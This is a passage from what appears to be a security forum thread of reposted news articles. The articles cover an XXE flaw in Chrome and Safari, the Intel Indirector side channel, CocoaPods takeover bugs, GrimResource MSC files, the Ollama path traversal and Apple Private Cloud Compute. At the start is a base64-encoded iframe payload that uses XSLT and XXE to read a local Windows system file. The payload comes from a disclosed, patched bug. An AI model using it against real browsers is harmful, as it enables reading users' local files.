src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/> </body> ZIP archive for testing: libxslt.zip. The Bounty All findings were immediately reported to the vendors. Safari Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000. 💰 Chrome Google implemented the patch and enforced security for documents loaded by the XSL’s document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000. 💸 Links https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40415 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4357 https://issues.chromium.org/issues/40066577 Feel free to write your thoughts about the article on our X page. Follow @ptswarm so you don’t miss our future research and other publications. Source: https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/
      • 4
      • Upvote
  8. Modern CPUs from Intel, including Raptor Lake and Alder Lake, have been found vulnerable to a new side-channel attack that could be exploited to leak sensitive information from the processors. The attack, codenamed Indirector by security researchers Luyi Li, Hosein Yavarzadeh, and Dean Tullsen, leverages shortcomings identified in Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and compromise the security of the CPUs. "The Indirect Branch Predictor (IBP) is a hardware component in modern CPUs that predicts the target addresses of indirect branches," the researchers noted. "Indirect branches are control flow instructions whose target address is computed at runtime, making them challenging to predict accurately. The IBP uses a combination of global history and branch address to predict the target address of indirect branches." The idea, at its core, is to identify vulnerabilities in IBP to launch precise Branch Target Injection (BTI) attacks – aka Spectre v2 (CVE-2017-5715) – which target a processor's indirect branch predictor to result in unauthorized disclosure of information to an attacker with local user access via a side-channel. This is accomplished by means of a custom tool called iBranch Locator that's used to locate any indirect branch, followed by carrying out precision targeted IBP and BTP injections to perform speculative execution. Intel, which was made aware of the findings in February 2024, has since informed other affected hardware/software vendors about the issue. As mitigations, it's recommended to make use of the Indirect Branch Predictor Barrier (IBPB) more aggressively and harden the Branch Prediction Unit (BPU) design by incorporating more complex tags, encryption, and randomization. The research comes as Arm CPUs have been found susceptible to a speculative execution attack of their own called TIKTAG that targets the Memory Tagging Extension (MTE) to leak data with over a 95% success rate in less than four seconds. The study "identifies new TikTag gadgets capable of leaking the MTE tags from arbitrary memory addresses through speculative execution," researchers Juhee Kim, Jinbum Park, Sihyeon Roh, Jaeyoung Chung, Youngjoo Lee, Taesoo Kim, and Byoungyoung Lee said. "With TikTag gadgets, attackers can bypass the probabilistic defense of MTE, increasing the attack success rate by close to 100%." In response to the disclosure, Arm said "MTE can provide a limited set of deterministic first line defenses, and a broader set of probabilistic first line defenses, against specific classes of exploits." "However, the probabilistic properties are not designed to be a full solution against an interactive adversary that is able to brute force, leak, or craft arbitrary Address Tags." Source: https://thehackernews.com/2024/07/new-intel-cpu-vulnerability-indirector.html
      • 1
      • Upvote
  9. A trio of security flaws has been uncovered in the CocoaPods dependency manager for Swift and Objective-C Cocoa projects that could be exploited to stage software supply chain attacks, putting downstream customers at severe risks. The vulnerabilities allow "any malicious actor to claim ownership over thousands of unclaimed pods and insert malicious code into many of the most popular iOS and macOS applications," E.V.A Information Security researchers Reef Spektor and Eran Vaknin said in a report published today. The Israeli application security firm said the three issues have since been patched by CocoaPods as of October 2023. It also resets all user sessions at the time in response to the disclosures. One of the vulnerabilities is CVE-2024-38368 (CVSS score: 9.3), which makes it possible for an attacker to abuse the "Claim Your Pods" process and take control of a package, effectively allowing them to tamper with the source code and introduce malicious changes. However, this required that all prior maintainers have been removed from the project. The roots of the problem go back to 2014, when a migration to the Trunk server left thousands of packages with unknown (or unclaimed) owners, permitting an attacker to use a public API for claiming pods and an email address that was available in the CocoaPods source code ("unclaimed-pods@cocoapods.org") to take over control. The second bug is even more critical (CVE-2024-38366, CVSS score: 10.0) and takes advantage of an insecure email verification workflow to run arbitrary code on the Trunk server, which could then be used to manipulate or replace the packages. Also identified in the service is a second problem in the email address verification component (CVE-2024-38367, CVSS score: 8.2) that could entice a recipient into clicking on a seemingly-benign verification link, when, in reality, it reroutes the request to an attacker-controlled domain in order to gain access to a developer's session tokens. Making matters worse, this can be upgraded into a zero-click account takeover attack by spoofing an HTTP header – i.e., modifying the X-Forwarded-Host header field – and taking advantage of misconfigured email security tools. "We have found that almost every pod owner is registered with their organizational email on the Trunk server, which makes them vulnerable to our zero-click takeover vulnerability," the researchers said. This is not the first time CocoaPods has come under the scanner. In March 2023, Checkmarx revealed that an abandoned sub-domain associated with the dependency manager ("cdn2.cocoapods[.]org") could have been hijacked by an adversary via GitHub Pages with an aim to host their payloads. Source: https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html
      • 1
      • Upvote
  10. Threat actors are exploiting a novel attack technique in the wild that leverages specially crafted management saved console (MSC) files to gain full code execution using Microsoft Management Console (MMC) and evade security defenses. Elastic Security Labs has codenamed the approach GrimResource after identifying an artifact ("sccm-updater.msc") that was uploaded to the VirusTotal malware scanning platform on June 6, 2024. "When a maliciously crafted console file is imported, a vulnerability in one of the MMC libraries can lead to running adversary code, including malware," the company said in a statement shared with The Hacker News. "Attackers can combine this technique with DotNetToJScript to gain arbitrary code execution, which can lead to unauthorized access, system takeover and more." The use of uncommon file types as a malware distribution vector is seen as an alternative attempt by adversaries to get around security guardrails erected by Microsoft in recent years, including disabling macros by default in Office files downloaded from the internet. Last month, South Korean cybersecurity firm Genians detailed the use of a malicious MSC file by the North Korea-linked Kimsuky hacking group to deliver malware. GrimResource, on the other hand, exploits a cross-site scripting (XSS) flaw present in the apds.dll library to execute arbitrary JavaScript code in the context of MMC. The XSS flaw was originally reported to Microsoft and Adobe in late 2018, although it remains unpatched to date. This is accomplished by adding a reference to the vulnerable APDS resource in the StringTable section of a malicious MSC file, which, when opened using MMC, triggers the execution of JavaScript code. The technique not only bypasses ActiveX warnings, it can be combined with DotNetToJScript to gain arbitrary code execution. The analyzed sample uses this approach to launch a .NET loader component dubbed PASTALOADER that ultimately paves the way for Cobalt Strike. "After Microsoft disabled Office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity," security researchers Joe Desimone and Samir Bousseaden said. "However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files." Source: https://thehackernews.com/2024/06/new-attack-technique-exploits-microsoft.html
  11. Cybersecurity researchers have detailed a now-patched security flaw affecting the Ollama open-source artificial intelligence (AI) infrastructure platform that could be exploited to achieve remote code execution. Tracked as CVE-2024-37032, the vulnerability has been codenamed Probllama by cloud security firm Wiz. Following responsible disclosure on May 5, 2024, the issue was addressed in version 0.1.34 released on May 7, 2024. Ollama is a service for packaging, deploying, running large language models (LLMs) locally on Windows, Linux, and macOS devices. At its core, the issue relates to a case of insufficient input validation that results in a path traversal flaw an attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution. The shortcoming requires the threat actor to send specially crafted HTTP requests to the Ollama API server for successful exploitation. It specifically takes advantage of the API endpoint "/api/pull" – which is used to download a model from the official registry or from a private repository – to provide a malicious model manifest file that contains a path traversal payload in the digest field. This issue could be abused not only to corrupt arbitrary files on the system, but also to obtain code execution remotely by overwriting a configuration file ("etc/ld.so.preload") associated with the dynamic linker ("ld.so") to include a rogue shared library and launch it every time prior to executing any program. While the risk of remote code execution is reduced to a great extent in default Linux installations due to the fact that the API server binds to localhost, it's not the case with docker deployments, where the API server is publicly exposed. "This issue is extremely severe in Docker installations, as the server runs with `root` privileges and listens on `0.0.0.0` by default – which enables remote exploitation of this vulnerability," security researcher Sagi Tzadik said. Compounding matters further is the inherent lack of authentication associated with Ollama, thereby allowing an attacker to exploit a publicly-accessible server to steal or tamper with AI models, and compromise self-hosted AI inference servers. This also requires that such services are secured using middleware like reverse proxies with authentication. Wiz said it identified over 1,000 Ollama exposed instances hosting numerous AI models without any protection. "CVE-2024-37032 is an easy-to-exploit remote code execution that affects modern AI infrastructure," Tzadik said. "Despite the codebase being relatively new and written in modern programming languages, classic vulnerabilities such as path traversal remain an issue." The development comes as AI security company Protect AI warned of over 60 security defects affecting various open-source AI/ML tools, including critical issues that could lead to information disclosure, access to restricted resources, privilege escalation, and complete system takeover. The most severe of these vulnerabilities is CVE-2024-22476 (CVSS score 10.0), an SQL injection flaw in Intel Neural Compressor software that could allow attackers to download arbitrary files from the host system. It was addressed in version 2.5.0. Source: https://thehackernews.com/2024/06/critical-rce-vulnerability-discovered.html
  12. akkiliON

    Lol.

  13. Apple has announced the launch of a "groundbreaking cloud intelligence system" called Private Cloud Compute (PCC) that's designed for processing artificial intelligence (AI) tasks in a privacy-preserving manner in the cloud. The tech giant described PCC as the "most advanced security architecture ever deployed for cloud AI compute at scale." PCC coincides with the arrival of new generative AI (GenAI) features – collectively dubbed Apple Intelligence, or AI for short – that the iPhone maker unveiled in its next generation of software, including iOS 18, iPadOS 18, and macOS Sequoia. All of the Apple Intelligence features, both the ones that run on-device and those that rely on PCC, leverage in-house generative models trained on "licensed data, including data selected to enhance specific features, as well as publicly available data collected by our web-crawler, AppleBot." With PCC, the idea is to essentially offload complex requests that require more processing power to the cloud, at the same time ensure that data is never retained or exposed to any third-party, including Apple, a mechanism the company refers to as stateless computation. The architecture that underpins PCC is a custom-built server node that brings together Apple silicon, Secure Enclave, and Secure Boot against the backdrop of a hardened operating system that's tailor made for running Large Language Model (LLM) inference workloads. This not only presents an "extremely narrow attack surface," according to Apple, but also allows it to leverage Code Signing and sandboxing to ensure that only authorized and cryptographically measured code is executable on the data center and that the user data doesn't break out of the confines of the trust perimeter. "Technologies such as Pointer Authentication Codes and sandboxing act to resist such exploitation and limit an attacker's horizontal movement within the PCC node," it said. "The inference control and dispatch layers are written in Swift, ensuring memory safety, and use separate address spaces to isolate initial processing of requests." "This combination of memory safety and the principle of least privilege removes entire classes of attacks on the inference stack itself and limits the level of control and capability that a successful attack can obtain." Another notable security and privacy measure is the routing of PCC requests through an Oblivious HTTP (OHTTP) relay that's operated by an independent party to conceal the origin (i.e., IP address) of the requests, effectively preventing an attacker from using the IP address to correlate the requests to a specific individual. It's worth pointing out that Google also uses OHTTP relays as part of its Privacy Sandbox initiative as well as for Safe Browsing in the Chrome web browser to secure users from visiting potentially malicious sites. Apple further noted that independent security experts can inspect the code that runs on Apple silicon servers to verify the privacy aspects, adding PCC cryptographically ensures that its devices do not communicate with a server unless the software has been publicly logged for inspection. "Every production Private Cloud Compute software image will be published for independent binary inspection — including the OS, applications, and all relevant executables, which researchers can verify against the measurements in the transparency log," the company said. "Software will be published within 90 days of inclusion in the log, or after relevant software updates are available, whichever is sooner." Present alongside Apple Intelligence is an integration with OpenAI's ChatGPT into Siri and systemwide Writing Tools to generate text and images based on user-provided prompts, with Apple pointing out the privacy protections baked into the process for those who opt to access the virtual assistant. "Their IP addresses are obscured, and OpenAI won't store requests," Apple said. "ChatGPT's data-use policies apply for users who choose to connect their account." Apple Intelligence, which is expected to be generally available later this fall, will be limited to iPhone 15 Pro, iPhone 15 Pro Max, and iPad and Mac with M1 and later, that have Siri and device language set to U.S. English. Some of the other new privacy features Apple has introduced include options to lock and hide specific apps behind Face ID, Touch ID, or a passcode; let users choose which contacts to share with an app; a dedicated Passwords app; and a refreshed Privacy & Security section in Settings. According to MacRumors, the Passwords app also features a setting to automatically upgrade existing accounts to passkeys. On top of that, Apple has replaced the Private Wi-Fi Address toggle for Wi-Fi networks with a new Rotate Wi-Fi Address setting to minimize tracking. Source: https://thehackernews.com/2024/06/apple-integrates-openais-chatgpt-into.html
      • 1
      • Upvote
  14. Link-uri: https://www.facebook.com/help/582999911881572?cms_id=582999911881572 https://www.facebook.com/help/1074937925896061 Eu am gasit aceste pagini. Poate iti sunt de ajutor. Eu nu am cont pe facebook si nici nu stiu cum sta treaba aceasta cu recuperarea contului. Ai incercat odata sa vezi daca ai cum sa iti recuperezi contul folosind aceasta pagina ? https://www.facebook.com/hacked?_rdr
×
×
  • Create New...